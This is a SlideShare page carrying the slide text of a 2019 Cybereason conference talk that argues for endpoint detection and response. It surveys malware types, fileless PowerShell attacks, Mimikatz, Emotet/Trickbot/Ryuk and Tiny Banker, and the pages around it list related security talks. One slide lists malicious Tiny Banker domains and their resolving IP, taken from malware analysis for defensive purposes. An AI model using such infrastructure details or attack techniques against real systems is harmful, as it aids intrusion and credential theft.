SlideShare a Scribd company logo

The Case for EDR: What's In Your Toolkit

ā€¢Download as PPTX, PDFā€¢
ā€¢
Dawn Yankeelov
Dawn Yankeelov

This presentation was given by Security Analyst Josh Chou from Cybereason on June 14, 2019 at the Technology Association of Louisville Kentucky's Cybersecurity Summit.

Technology
1 of 36
Ā© 2017 Cybereason Inc. All rights reserved. Whatā€™s in your toolkit? The Case for EDR
Ā© 2017 Cybereason Inc. All rights reserved. Index ā€¢ This presentation: ā€¢ About Me ā€¢ About Cybereason ā€¢ My Job ā€¢ Disclaimers ā€¢ Products/Vendors ā€¢ Defense In Depth ā€¢ Examples ā€¢ Q/A
Ā© 2017 Cybereason Inc. All rights reserved. About me ā€¢ Hometown boy! ā€¢ CAL Alumni 2001 ā€¢ Education ā€¢ USF (Double BA in Poly Sci and Finance) ā€¢ UofL (Post Bac Cert in Accounting) ā€¢ Boston University MET (MS in Comp Sci) ā€¢ Work ā€¢ American Well: Security Analyst (2015) ā€¢ PayPal: Security Engineer (2016-2018) ā€¢ Cybereason: Security/Malware Analyst (2019) ā€¢ Other ā€¢ Jit-Jitsu Whitebelt (Black belt in training)
Ā© 2017 Cybereason Inc. All rights reserved. About Cybereason ā€¢ Founded in 2012 by former members of the elite Israeli Defense force 8200 ā€¢ Currently around 500 employees with $100+ million dollars in funding, most from Japanese Softbank ā€¢ Offices in Boston, Tel Aviv, Tokyo, London and Sydney (more coming soon)
Ā© 2017 Cybereason Inc. All rights reserved. Whatā€™s my job? ā€¢ Identify the Malware before it spreads ā€¢ Drop unidentified Malware into sandbox ā€¢ Reverse Engineer Malware ā€¢ Triage and make recommendations based on the type of Malware ā€¢ Quarantine vs Re-Image the machine
Ā© 2017 Cybereason Inc. All rights reserved. Disclaimer! ā€¢ Iā€™m still learning!!!
Ā© 2017 Cybereason Inc. All rights reserved. Other Disclaimer ā€¢ EDR is not meant there is a be all end all solution!
Ā© 2017 Cybereason Inc. All rights reserved. Which products? Who are the vendors? Anti-virus Firewall WAF
Ā© 2017 Cybereason Inc. All rights reserved. New Generation Products EDR
Ā© 2017 Cybereason Inc. All rights reserved. Defense in Depth Recognize this?
Ā© 2017 Cybereason Inc. All rights reserved. Defense in Depth The Layers
Ā© 2017 Cybereason Inc. All rights reserved. What is EDR? Endpoint Detection and ResponseRemediation ā€¢ Gives a full story ā€¢ Shows behaviors and uses data and predictive analytics to determine malicious behavior ā€¢ Addresses the need for continuous monitoring ā€¢ Combines many tools for a single purpose which empowers the analyst as well as the party to make sure the proper actions are taken ā€¢ In other words its helpful!
Ā© 2017 Cybereason Inc. All rights reserved. Attack Lifecycle
Ā© 2017 Cybereason Inc. All rights reserved. Different types of Malware
Ā© 2017 Cybereason Inc. All rights reserved. APT vs. Commodity Malware WannaCry ā€¢ NSA Leak ā€¢ Eternal Blue & Double Pulsar
Ā© 2017 Cybereason Inc. All rights reserved. APT vs. Commodity Malware Stuxnet
Ā© 2017 Cybereason Inc. All rights reserved. Types of Malware ā€¢ PUP (potentially unwanted program) ā€¢ Applications that would be considered unwanted despite often having been downloaded by the user. ā€¢ Ransomware ā€¢ Threatens to publish the victim's data or perpetually block access(encrypt) to it unless a ransom is paid.
Ā© 2017 Cybereason Inc. All rights reserved. Types of Malware ā€¢ Dropper ā€¢ Malicious code that exists only to download other malicious code. ā€¢ Information-stealing malware ā€¢ Collects information from a victimā€™s computer and usually sends it to the attacker. ā€¢ Rootkit ā€¢ Malicious code designed to conceal the existence of other code.
Ā© 2017 Cybereason Inc. All rights reserved. Fileless Malware ā€¢ What is it? ā€¢ Legitimate process being ran in the background ā€¢ Data saved in Registry can be called by wscript ā€¢ Powershell process one liner process base64 etc pushses straight to RAM ā€¢ Calling invoke expression can run via admin and collect and receive data and go undetected to typical AV as this is a legitimate process ā€¢ Using Operating System against itself ā€¢ Cobalt kitty --------------------------ļƒ 
Ā© 2017 Cybereason Inc. All rights reserved. Fileless Malware ā€¢ Current Trends ā€¢ 42% of companies surveyed by the Ponemon Institute reported experiencing at least one fileless malware attack in 2017 and 77% of all successful attacks were fileless. (https://digitalguardian.com/blog/what-fileless-malware-or-non-malware-attack- definition-and-best-practices-fileless-malware) ā€¢ In the first half of 2018 there was a 94% increase in fileless malware attacks and 5.2 Powershell attacks per 1000 endpoint according to Threatpost (https://threatpost.com/threatlist- ransomware-attacks-down-fileless-malware-up-in-2018/136962/)
Ā© 2017 Cybereason Inc. All rights reserved. Mimikatz ā€¢ What is it? ā€¢ Open source application (Used both by Red team and malicious individuals) to dump clear text authentication credentials ā€¢ By default since windows 8.1 wont spit out clear text passwords (Wdigest)
Ā© 2017 Cybereason Inc. All rights reserved. Emotet/Trickbot/Ryuk
Ā© 2017 Cybereason Inc. All rights reserved. Emotet/Trickbot/Ryuk
Ā© 2017 Cybereason Inc. All rights reserved. Emotet/Trickbot/Ryuk
Ā© 2017 Cybereason Inc. All rights reserved. Emotet/Trickbot/Ryuk
Ā© 2017 Cybereason Inc. All rights reserved. Emotet/Trickbot/Ryuk
Ā© 2017 Cybereason Inc. All rights reserved. Tiny Banker
Ā© 2017 Cybereason Inc. All rights reserved. Tiny Banker
Ā© 2017 Cybereason Inc. All rights reserved. Tiny Banker The process ran a DNS query to the following: vqwgqnbtectr.pw > 216.218.185[.]162 sucjuv.in > 216.218.185[.]162 hbsnmsmlsvib.in > 216.218.185[.]162 ehhrupqrycm.pw > 216.218.185[.]162 uatuwc.pw > 216.218.185[.]162 fpexkrdtxpfs.in > 216.218.185[.]162 okzhyctznzft.pw > 216.218.185[.]162 zawmg.pw > 216.218.185[.]162 lxpcbahva.pw > 216.218.185[.]162 bifcp.in > 216.218.185[.]162 pojde.in > 216.218.185[.]162 And many many moreā€¦.
Ā© 2017 Cybereason Inc. All rights reserved. Tiny Banker
Ā© 2017 Cybereason Inc. All rights reserved. Tiny Banker
Ā© 2017 Cybereason Inc. All rights reserved. Tiny Banker
Ā© 2017 Cybereason Inc. All rights reserved. Tiny Banker
Ā© 2017 Cybereason Inc. All rights reserved. Demo https://www.youtube.com/watch?v=Hc7h-rIyd5A
Ā© 2017 Cybereason Inc. All rights reserved. Q/A ā€¢ Feedback ā€¢ Joshua.chou@cybereason.com ā€¢ jdudeoflife
Ā© 2017 Cybereason Inc. All rights reserved. you.Thank www.cybereason.com

Recommended

Research: From zero to phishing in 60 seconds
Research: From zero to phishing in 60 seconds Research: From zero to phishing in 60 seconds
Research: From zero to phishing in 60 seconds
Imperva
Ā 
Intelligence driven defense webinar
Intelligence driven defense webinarIntelligence driven defense webinar
Intelligence driven defense webinar
ThreatConnect
Ā 
Save Time and Act Faster with Playbooks
Save Time and Act Faster with PlaybooksSave Time and Act Faster with Playbooks
Save Time and Act Faster with Playbooks
ThreatConnect
Ā 
Cyber Resilency VANCOUVER, BC Nov 2017
Cyber Resilency VANCOUVER, BC Nov 2017 Cyber Resilency VANCOUVER, BC Nov 2017
Cyber Resilency VANCOUVER, BC Nov 2017
Kevin Murphy
Ā 
Open Source Insight: You Canā€™t Beat Hackers and the Pentagon Moves into Open...
Open Source Insight: You Canā€™t Beat Hackers and the Pentagon Moves into Open...Open Source Insight: You Canā€™t Beat Hackers and the Pentagon Moves into Open...
Open Source Insight: You Canā€™t Beat Hackers and the Pentagon Moves into Open...
Black Duck by Synopsys
Ā 
Advanced Threat Hunting - Botconf 2017
Advanced Threat Hunting - Botconf 2017Advanced Threat Hunting - Botconf 2017
Advanced Threat Hunting - Botconf 2017
Kevin Finley
Ā 
Managing Indicator Deprecation in ThreatConnect
Managing Indicator Deprecation in ThreatConnectManaging Indicator Deprecation in ThreatConnect
Managing Indicator Deprecation in ThreatConnect
ThreatConnect
Ā 
Open Source Insight: Black Duck Now Part of Synopsys, Tackling Container Secu...
Open Source Insight: Black Duck Now Part of Synopsys, Tackling Container Secu...Open Source Insight: Black Duck Now Part of Synopsys, Tackling Container Secu...
Open Source Insight: Black Duck Now Part of Synopsys, Tackling Container Secu...
Black Duck by Synopsys
Ā 

Recommended

Research: From zero to phishing in 60 seconds
Research: From zero to phishing in 60 seconds Research: From zero to phishing in 60 seconds
Research: From zero to phishing in 60 seconds
Imperva
Ā 
Intelligence driven defense webinar
Intelligence driven defense webinarIntelligence driven defense webinar
Intelligence driven defense webinar
ThreatConnect
Ā 
Save Time and Act Faster with Playbooks
Save Time and Act Faster with PlaybooksSave Time and Act Faster with Playbooks
Save Time and Act Faster with Playbooks
ThreatConnect
Ā 
Cyber Resilency VANCOUVER, BC Nov 2017
Cyber Resilency VANCOUVER, BC Nov 2017 Cyber Resilency VANCOUVER, BC Nov 2017
Cyber Resilency VANCOUVER, BC Nov 2017
Kevin Murphy
Ā 
Open Source Insight: You Canā€™t Beat Hackers and the Pentagon Moves into Open...
Open Source Insight: You Canā€™t Beat Hackers and the Pentagon Moves into Open...Open Source Insight: You Canā€™t Beat Hackers and the Pentagon Moves into Open...
Open Source Insight: You Canā€™t Beat Hackers and the Pentagon Moves into Open...
Black Duck by Synopsys
Ā 
Advanced Threat Hunting - Botconf 2017
Advanced Threat Hunting - Botconf 2017Advanced Threat Hunting - Botconf 2017
Advanced Threat Hunting - Botconf 2017
Kevin Finley
Ā 
Managing Indicator Deprecation in ThreatConnect
Managing Indicator Deprecation in ThreatConnectManaging Indicator Deprecation in ThreatConnect
Managing Indicator Deprecation in ThreatConnect
ThreatConnect
Ā 
Open Source Insight: Black Duck Now Part of Synopsys, Tackling Container Secu...
Open Source Insight: Black Duck Now Part of Synopsys, Tackling Container Secu...Open Source Insight: Black Duck Now Part of Synopsys, Tackling Container Secu...
Open Source Insight: Black Duck Now Part of Synopsys, Tackling Container Secu...
Black Duck by Synopsys
Ā 
The Business Benefits of Threat Intelligence Webinar
The Business Benefits of Threat Intelligence WebinarThe Business Benefits of Threat Intelligence Webinar
The Business Benefits of Threat Intelligence Webinar
ThreatConnect
Ā 
Cisco Connect 2018 Malaysia - Cisco incident response services-strengthen you...
Cisco Connect 2018 Malaysia - Cisco incident response services-strengthen you...Cisco Connect 2018 Malaysia - Cisco incident response services-strengthen you...
Cisco Connect 2018 Malaysia - Cisco incident response services-strengthen you...
NetworkCollaborators
Ā 
A Blueprint for Web Attack Survival
A Blueprint for Web Attack SurvivalA Blueprint for Web Attack Survival
A Blueprint for Web Attack Survival
Imperva
Ā 
Cerdant Security State of the Union
Cerdant Security State of the UnionCerdant Security State of the Union
Cerdant Security State of the Union
David Perkins
Ā 
[OWASP Poland Day] Embedding security into SDLC + GDPR
[OWASP Poland Day] Embedding security into SDLC + GDPR[OWASP Poland Day] Embedding security into SDLC + GDPR
[OWASP Poland Day] Embedding security into SDLC + GDPR
OWASP
Ā 
Avoiding Sophisticated Targeted Breach Critical Guidance Healthcare
Avoiding Sophisticated Targeted Breach Critical Guidance HealthcareAvoiding Sophisticated Targeted Breach Critical Guidance Healthcare
Avoiding Sophisticated Targeted Breach Critical Guidance Healthcare
Cybereason
Ā 
Open Source Insight: Container Tech, Data Centre Security & 2018's Biggest Se...
Open Source Insight: Container Tech, Data Centre Security & 2018's Biggest Se...Open Source Insight: Container Tech, Data Centre Security & 2018's Biggest Se...
Open Source Insight: Container Tech, Data Centre Security & 2018's Biggest Se...
Black Duck by Synopsys
Ā 
CEH Vs CISSP: Which one is better?
CEH Vs CISSP: Which one is better?CEH Vs CISSP: Which one is better?
CEH Vs CISSP: Which one is better?
Mercury Solutions Limited
Ā 
Ransomware: Why Are Backup Vendors Trying To Scare You?
Ransomware: Why Are Backup Vendors Trying To Scare You?Ransomware: Why Are Backup Vendors Trying To Scare You?
Ransomware: Why Are Backup Vendors Trying To Scare You?
marketingunitrends
Ā 
Solnet dev secops meetup
Solnet dev secops meetupSolnet dev secops meetup
Solnet dev secops meetup
pbink
Ā 
Robert Hurlbut - Threat Modeling for Secure Software Design
Robert Hurlbut - Threat Modeling for Secure Software DesignRobert Hurlbut - Threat Modeling for Secure Software Design
Robert Hurlbut - Threat Modeling for Secure Software Design
centralohioissa
Ā 
Š†Š›Š›ŠÆ Š›Š£Š‘Š•ŠŠ•Š¦Š¬ Ā«DevSecOps Š½Š°ŃŃ‚ŃƒŠæŠ½ŠøŠ¹ ŠµŃ‚Š°Šæ рŠ¾Š·Š²ŠøтŠŗу DevOpsĀ» GO DevOps
Š†Š›Š›ŠÆ Š›Š£Š‘Š•ŠŠ•Š¦Š¬ Ā«DevSecOps Š½Š°ŃŃ‚ŃƒŠæŠ½ŠøŠ¹ ŠµŃ‚Š°Šæ рŠ¾Š·Š²ŠøтŠŗу DevOpsĀ» GO DevOpsŠ†Š›Š›ŠÆ Š›Š£Š‘Š•ŠŠ•Š¦Š¬ Ā«DevSecOps Š½Š°ŃŃ‚ŃƒŠæŠ½ŠøŠ¹ ŠµŃ‚Š°Šæ рŠ¾Š·Š²ŠøтŠŗу DevOpsĀ» GO DevOps
Š†Š›Š›ŠÆ Š›Š£Š‘Š•ŠŠ•Š¦Š¬ Ā«DevSecOps Š½Š°ŃŃ‚ŃƒŠæŠ½ŠøŠ¹ ŠµŃ‚Š°Šæ рŠ¾Š·Š²ŠøтŠŗу DevOpsĀ» GO DevOps
UA DevOps Conference
Ā 
Maltego Webinar Slides
Maltego Webinar SlidesMaltego Webinar Slides
Maltego Webinar Slides
ThreatConnect
Ā 
Building a Strategic Plan for Your Security Awareness Program
Building a Strategic Plan for Your Security Awareness ProgramBuilding a Strategic Plan for Your Security Awareness Program
Building a Strategic Plan for Your Security Awareness Program
Priyanka Aash
Ā 
Why security is the kidney not the tail of the dog v3
Why security is the kidney not the tail of the dog v3Why security is the kidney not the tail of the dog v3
Why security is the kidney not the tail of the dog v3
Ernest Staats
Ā 
Cisco Connect 2018 Thailand - Changing the security equation demetris booth_c...
Cisco Connect 2018 Thailand - Changing the security equation demetris booth_c...Cisco Connect 2018 Thailand - Changing the security equation demetris booth_c...
Cisco Connect 2018 Thailand - Changing the security equation demetris booth_c...
NetworkCollaborators
Ā 
Malware: To The Realm of Malicious Code (Training)
Malware: To The Realm of Malicious Code (Training)Malware: To The Realm of Malicious Code (Training)
Malware: To The Realm of Malicious Code (Training)
Satria Ady Pradana
Ā 
Proactive Threat Hunting: Game-Changing Endpoint Protection Beyond Alerting
Proactive Threat Hunting: Game-Changing Endpoint Protection Beyond AlertingProactive Threat Hunting: Game-Changing Endpoint Protection Beyond Alerting
Proactive Threat Hunting: Game-Changing Endpoint Protection Beyond Alerting
CrowdStrike
Ā 
API Security Survey
API Security SurveyAPI Security Survey
API Security Survey
Imperva
Ā 
The Top 7 Causes of Major Security Breaches
The Top 7 Causes of Major Security BreachesThe Top 7 Causes of Major Security Breaches
The Top 7 Causes of Major Security Breaches
Kaseya
Ā 
Understanding Your Attack Surface and Detecting & Mitigating External Threats
Understanding Your Attack Surface and Detecting & Mitigating External ThreatsUnderstanding Your Attack Surface and Detecting & Mitigating External Threats
Understanding Your Attack Surface and Detecting & Mitigating External Threats
Ulf Mattsson
Ā 
The Importance of Cybersecurity in 2017
The Importance of Cybersecurity in 2017The Importance of Cybersecurity in 2017
The Importance of Cybersecurity in 2017
R-Style Lab
Ā 

More Related Content

What's hot

The Business Benefits of Threat Intelligence Webinar
The Business Benefits of Threat Intelligence WebinarThe Business Benefits of Threat Intelligence Webinar
The Business Benefits of Threat Intelligence Webinar
ThreatConnect
Ā 
Cisco Connect 2018 Malaysia - Cisco incident response services-strengthen you...
Cisco Connect 2018 Malaysia - Cisco incident response services-strengthen you...Cisco Connect 2018 Malaysia - Cisco incident response services-strengthen you...
Cisco Connect 2018 Malaysia - Cisco incident response services-strengthen you...
NetworkCollaborators
Ā 
A Blueprint for Web Attack Survival
A Blueprint for Web Attack SurvivalA Blueprint for Web Attack Survival
A Blueprint for Web Attack Survival
Imperva
Ā 
Cerdant Security State of the Union
Cerdant Security State of the UnionCerdant Security State of the Union
Cerdant Security State of the Union
David Perkins
Ā 
[OWASP Poland Day] Embedding security into SDLC + GDPR
[OWASP Poland Day] Embedding security into SDLC + GDPR[OWASP Poland Day] Embedding security into SDLC + GDPR
[OWASP Poland Day] Embedding security into SDLC + GDPR
OWASP
Ā 
Avoiding Sophisticated Targeted Breach Critical Guidance Healthcare
Avoiding Sophisticated Targeted Breach Critical Guidance HealthcareAvoiding Sophisticated Targeted Breach Critical Guidance Healthcare
Avoiding Sophisticated Targeted Breach Critical Guidance Healthcare
Cybereason
Ā 
Open Source Insight: Container Tech, Data Centre Security & 2018's Biggest Se...
Open Source Insight: Container Tech, Data Centre Security & 2018's Biggest Se...Open Source Insight: Container Tech, Data Centre Security & 2018's Biggest Se...
Open Source Insight: Container Tech, Data Centre Security & 2018's Biggest Se...
Black Duck by Synopsys
Ā 
CEH Vs CISSP: Which one is better?
CEH Vs CISSP: Which one is better?CEH Vs CISSP: Which one is better?
CEH Vs CISSP: Which one is better?
Mercury Solutions Limited
Ā 
Ransomware: Why Are Backup Vendors Trying To Scare You?
Ransomware: Why Are Backup Vendors Trying To Scare You?Ransomware: Why Are Backup Vendors Trying To Scare You?
Ransomware: Why Are Backup Vendors Trying To Scare You?
marketingunitrends
Ā 
Solnet dev secops meetup
Solnet dev secops meetupSolnet dev secops meetup
Solnet dev secops meetup
pbink
Ā 
Robert Hurlbut - Threat Modeling for Secure Software Design
Robert Hurlbut - Threat Modeling for Secure Software DesignRobert Hurlbut - Threat Modeling for Secure Software Design
Robert Hurlbut - Threat Modeling for Secure Software Design
centralohioissa
Ā 
Š†Š›Š›ŠÆ Š›Š£Š‘Š•ŠŠ•Š¦Š¬ Ā«DevSecOps Š½Š°ŃŃ‚ŃƒŠæŠ½ŠøŠ¹ ŠµŃ‚Š°Šæ рŠ¾Š·Š²ŠøтŠŗу DevOpsĀ» GO DevOps
Š†Š›Š›ŠÆ Š›Š£Š‘Š•ŠŠ•Š¦Š¬ Ā«DevSecOps Š½Š°ŃŃ‚ŃƒŠæŠ½ŠøŠ¹ ŠµŃ‚Š°Šæ рŠ¾Š·Š²ŠøтŠŗу DevOpsĀ» GO DevOpsŠ†Š›Š›ŠÆ Š›Š£Š‘Š•ŠŠ•Š¦Š¬ Ā«DevSecOps Š½Š°ŃŃ‚ŃƒŠæŠ½ŠøŠ¹ ŠµŃ‚Š°Šæ рŠ¾Š·Š²ŠøтŠŗу DevOpsĀ» GO DevOps
Š†Š›Š›ŠÆ Š›Š£Š‘Š•ŠŠ•Š¦Š¬ Ā«DevSecOps Š½Š°ŃŃ‚ŃƒŠæŠ½ŠøŠ¹ ŠµŃ‚Š°Šæ рŠ¾Š·Š²ŠøтŠŗу DevOpsĀ» GO DevOps
UA DevOps Conference
Ā 
Maltego Webinar Slides
Maltego Webinar SlidesMaltego Webinar Slides
Maltego Webinar Slides
ThreatConnect
Ā 
Building a Strategic Plan for Your Security Awareness Program
Building a Strategic Plan for Your Security Awareness ProgramBuilding a Strategic Plan for Your Security Awareness Program
Building a Strategic Plan for Your Security Awareness Program
Priyanka Aash
Ā 
Why security is the kidney not the tail of the dog v3
Why security is the kidney not the tail of the dog v3Why security is the kidney not the tail of the dog v3
Why security is the kidney not the tail of the dog v3
Ernest Staats
Ā 
Cisco Connect 2018 Thailand - Changing the security equation demetris booth_c...
Cisco Connect 2018 Thailand - Changing the security equation demetris booth_c...Cisco Connect 2018 Thailand - Changing the security equation demetris booth_c...
Cisco Connect 2018 Thailand - Changing the security equation demetris booth_c...
NetworkCollaborators
Ā 
Malware: To The Realm of Malicious Code (Training)
Malware: To The Realm of Malicious Code (Training)Malware: To The Realm of Malicious Code (Training)
Malware: To The Realm of Malicious Code (Training)
Satria Ady Pradana
Ā 
Proactive Threat Hunting: Game-Changing Endpoint Protection Beyond Alerting
Proactive Threat Hunting: Game-Changing Endpoint Protection Beyond AlertingProactive Threat Hunting: Game-Changing Endpoint Protection Beyond Alerting
Proactive Threat Hunting: Game-Changing Endpoint Protection Beyond Alerting
CrowdStrike
Ā 
API Security Survey
API Security SurveyAPI Security Survey
API Security Survey
Imperva
Ā 
The Top 7 Causes of Major Security Breaches
The Top 7 Causes of Major Security BreachesThe Top 7 Causes of Major Security Breaches
The Top 7 Causes of Major Security Breaches
Kaseya
Ā 

What's hot (20)

The Business Benefits of Threat Intelligence Webinar
The Business Benefits of Threat Intelligence WebinarThe Business Benefits of Threat Intelligence Webinar
The Business Benefits of Threat Intelligence Webinar
Ā 
Cisco Connect 2018 Malaysia - Cisco incident response services-strengthen you...
Cisco Connect 2018 Malaysia - Cisco incident response services-strengthen you...Cisco Connect 2018 Malaysia - Cisco incident response services-strengthen you...
Cisco Connect 2018 Malaysia - Cisco incident response services-strengthen you...
Ā 
A Blueprint for Web Attack Survival
A Blueprint for Web Attack SurvivalA Blueprint for Web Attack Survival
A Blueprint for Web Attack Survival
Ā 
Cerdant Security State of the Union
Cerdant Security State of the UnionCerdant Security State of the Union
Cerdant Security State of the Union
Ā 
[OWASP Poland Day] Embedding security into SDLC + GDPR
[OWASP Poland Day] Embedding security into SDLC + GDPR[OWASP Poland Day] Embedding security into SDLC + GDPR
[OWASP Poland Day] Embedding security into SDLC + GDPR
Ā 
Avoiding Sophisticated Targeted Breach Critical Guidance Healthcare
Avoiding Sophisticated Targeted Breach Critical Guidance HealthcareAvoiding Sophisticated Targeted Breach Critical Guidance Healthcare
Avoiding Sophisticated Targeted Breach Critical Guidance Healthcare
Ā 
Open Source Insight: Container Tech, Data Centre Security & 2018's Biggest Se...
Open Source Insight: Container Tech, Data Centre Security & 2018's Biggest Se...Open Source Insight: Container Tech, Data Centre Security & 2018's Biggest Se...
Open Source Insight: Container Tech, Data Centre Security & 2018's Biggest Se...
Ā 
CEH Vs CISSP: Which one is better?
CEH Vs CISSP: Which one is better?CEH Vs CISSP: Which one is better?
CEH Vs CISSP: Which one is better?
Ā 
Ransomware: Why Are Backup Vendors Trying To Scare You?
Ransomware: Why Are Backup Vendors Trying To Scare You?Ransomware: Why Are Backup Vendors Trying To Scare You?
Ransomware: Why Are Backup Vendors Trying To Scare You?
Ā 
Solnet dev secops meetup
Solnet dev secops meetupSolnet dev secops meetup
Solnet dev secops meetup
Ā 
Robert Hurlbut - Threat Modeling for Secure Software Design
Robert Hurlbut - Threat Modeling for Secure Software DesignRobert Hurlbut - Threat Modeling for Secure Software Design
Robert Hurlbut - Threat Modeling for Secure Software Design
Ā 
Š†Š›Š›ŠÆ Š›Š£Š‘Š•ŠŠ•Š¦Š¬ Ā«DevSecOps Š½Š°ŃŃ‚ŃƒŠæŠ½ŠøŠ¹ ŠµŃ‚Š°Šæ рŠ¾Š·Š²ŠøтŠŗу DevOpsĀ» GO DevOps
Š†Š›Š›ŠÆ Š›Š£Š‘Š•ŠŠ•Š¦Š¬ Ā«DevSecOps Š½Š°ŃŃ‚ŃƒŠæŠ½ŠøŠ¹ ŠµŃ‚Š°Šæ рŠ¾Š·Š²ŠøтŠŗу DevOpsĀ» GO DevOpsŠ†Š›Š›ŠÆ Š›Š£Š‘Š•ŠŠ•Š¦Š¬ Ā«DevSecOps Š½Š°ŃŃ‚ŃƒŠæŠ½ŠøŠ¹ ŠµŃ‚Š°Šæ рŠ¾Š·Š²ŠøтŠŗу DevOpsĀ» GO DevOps
Š†Š›Š›ŠÆ Š›Š£Š‘Š•ŠŠ•Š¦Š¬ Ā«DevSecOps Š½Š°ŃŃ‚ŃƒŠæŠ½ŠøŠ¹ ŠµŃ‚Š°Šæ рŠ¾Š·Š²ŠøтŠŗу DevOpsĀ» GO DevOps
Ā 
Maltego Webinar Slides
Maltego Webinar SlidesMaltego Webinar Slides
Maltego Webinar Slides
Ā 
Building a Strategic Plan for Your Security Awareness Program
Building a Strategic Plan for Your Security Awareness ProgramBuilding a Strategic Plan for Your Security Awareness Program
Building a Strategic Plan for Your Security Awareness Program
Ā 
Why security is the kidney not the tail of the dog v3
Why security is the kidney not the tail of the dog v3Why security is the kidney not the tail of the dog v3
Why security is the kidney not the tail of the dog v3
Ā 
Cisco Connect 2018 Thailand - Changing the security equation demetris booth_c...
Cisco Connect 2018 Thailand - Changing the security equation demetris booth_c...Cisco Connect 2018 Thailand - Changing the security equation demetris booth_c...
Cisco Connect 2018 Thailand - Changing the security equation demetris booth_c...
Ā 
Malware: To The Realm of Malicious Code (Training)
Malware: To The Realm of Malicious Code (Training)Malware: To The Realm of Malicious Code (Training)
Malware: To The Realm of Malicious Code (Training)
Ā 
Proactive Threat Hunting: Game-Changing Endpoint Protection Beyond Alerting
Proactive Threat Hunting: Game-Changing Endpoint Protection Beyond AlertingProactive Threat Hunting: Game-Changing Endpoint Protection Beyond Alerting
Proactive Threat Hunting: Game-Changing Endpoint Protection Beyond Alerting
Ā 
API Security Survey
API Security SurveyAPI Security Survey
API Security Survey
Ā 
The Top 7 Causes of Major Security Breaches
The Top 7 Causes of Major Security BreachesThe Top 7 Causes of Major Security Breaches
The Top 7 Causes of Major Security Breaches
Ā 

Similar to The Case for EDR: What's In Your Toolkit

Understanding Your Attack Surface and Detecting & Mitigating External Threats
Understanding Your Attack Surface and Detecting & Mitigating External ThreatsUnderstanding Your Attack Surface and Detecting & Mitigating External Threats
Understanding Your Attack Surface and Detecting & Mitigating External Threats
Ulf Mattsson
Ā 
The Importance of Cybersecurity in 2017
The Importance of Cybersecurity in 2017The Importance of Cybersecurity in 2017
The Importance of Cybersecurity in 2017
R-Style Lab
Ā 
Threat Hunting - Moving from the ad hoc to the formal
Threat Hunting - Moving from the ad hoc to the formalThreat Hunting - Moving from the ad hoc to the formal
Threat Hunting - Moving from the ad hoc to the formal
Priyanka Aash
Ā 
DĆ©couvrez le Rugged DevOps
DĆ©couvrez le Rugged DevOpsDĆ©couvrez le Rugged DevOps
DĆ©couvrez le Rugged DevOps
Talent Agile @ Avanade
Ā 
2017 March ISACA Security Challenges with the Internet of Things - Eric Vande...
2017 March ISACA Security Challenges with the Internet of Things - Eric Vande...2017 March ISACA Security Challenges with the Internet of Things - Eric Vande...
2017 March ISACA Security Challenges with the Internet of Things - Eric Vande...
Eric Vanderburg
Ā 
Create a Unified View of Your Application Security Program ā€“ Black Duck Hub a...
Create a Unified View of Your Application Security Program ā€“ Black Duck Hub a...Create a Unified View of Your Application Security Program ā€“ Black Duck Hub a...
Create a Unified View of Your Application Security Program ā€“ Black Duck Hub a...
Denim Group
Ā 
WEBINAR: How To Use Artificial Intelligence To Prevent Insider Threats
WEBINAR: How To Use Artificial Intelligence To Prevent Insider ThreatsWEBINAR: How To Use Artificial Intelligence To Prevent Insider Threats
WEBINAR: How To Use Artificial Intelligence To Prevent Insider Threats
Interset
Ā 
Best_of_Breed_3-24-2015_How_to_Achieve_ABAC_Today copy
Best_of_Breed_3-24-2015_How_to_Achieve_ABAC_Today copyBest_of_Breed_3-24-2015_How_to_Achieve_ABAC_Today copy
Best_of_Breed_3-24-2015_How_to_Achieve_ABAC_Today copy
Stephanie McVitty
Ā 
Netwatcher Credit Union Tech Talk
Netwatcher Credit Union Tech TalkNetwatcher Credit Union Tech Talk
Netwatcher Credit Union Tech Talk
NetWatcher
Ā 
(Isc)Ā² secure johannesburg
(Isc)Ā² secure johannesburg (Isc)Ā² secure johannesburg
(Isc)Ā² secure johannesburg
Tunde Ogunkoya
Ā 
Protecting What Matters Most ā€“ Data
Protecting What Matters Most ā€“ DataProtecting What Matters Most ā€“ Data
Protecting What Matters Most ā€“ Data
Fujitsu Middle East
Ā 
What Every Developer And Tester Should Know About Software Security
What Every Developer And Tester Should Know About Software SecurityWhat Every Developer And Tester Should Know About Software Security
What Every Developer And Tester Should Know About Software Security
Anne Oikarinen
Ā 
Open Source Security for Newbies - Best Practices
Open Source Security for Newbies - Best PracticesOpen Source Security for Newbies - Best Practices
Open Source Security for Newbies - Best Practices
Black Duck by Synopsys
Ā 
What is Network Security and Why is it Needed?
What is Network Security and Why is it Needed?What is Network Security and Why is it Needed?
What is Network Security and Why is it Needed?
lorzinian
Ā 
Donā€™t WannaCry? Hereā€™s How to Stop Those Ransomware Blues
Donā€™t WannaCry? Hereā€™s How to Stop Those Ransomware BluesDonā€™t WannaCry? Hereā€™s How to Stop Those Ransomware Blues
Donā€™t WannaCry? Hereā€™s How to Stop Those Ransomware Blues
Synopsys Software Integrity Group
Ā 
Next-level mobile app security: A programmatic approach
Next-level mobile app security: A programmatic approachNext-level mobile app security: A programmatic approach
Next-level mobile app security: A programmatic approach
NowSecure
Ā 
Building Blocks of Secure Development: How to Make Open Source Work for You
Building Blocks of Secure Development: How to Make Open Source Work for YouBuilding Blocks of Secure Development: How to Make Open Source Work for You
Building Blocks of Secure Development: How to Make Open Source Work for You
SBWebinars
Ā 
Cybersecurity.pptx
Cybersecurity.pptxCybersecurity.pptx
Cybersecurity.pptx
NOUREDDINEOUNINISSE
Ā 
Beyond takeover: stories from a hacked account
Beyond takeover: stories from a hacked accountBeyond takeover: stories from a hacked account
Beyond takeover: stories from a hacked account
Imperva
Ā 
Cyber security and demonstration of security tools
Cyber security and demonstration of security toolsCyber security and demonstration of security tools
Cyber security and demonstration of security tools
Vicky Fernandes
Ā 

Similar to The Case for EDR: What's In Your Toolkit (20)

Understanding Your Attack Surface and Detecting & Mitigating External Threats
Understanding Your Attack Surface and Detecting & Mitigating External ThreatsUnderstanding Your Attack Surface and Detecting & Mitigating External Threats
Understanding Your Attack Surface and Detecting & Mitigating External Threats
Ā 
The Importance of Cybersecurity in 2017
The Importance of Cybersecurity in 2017The Importance of Cybersecurity in 2017
The Importance of Cybersecurity in 2017
Ā 
Threat Hunting - Moving from the ad hoc to the formal
Threat Hunting - Moving from the ad hoc to the formalThreat Hunting - Moving from the ad hoc to the formal
Threat Hunting - Moving from the ad hoc to the formal
Ā 
DĆ©couvrez le Rugged DevOps
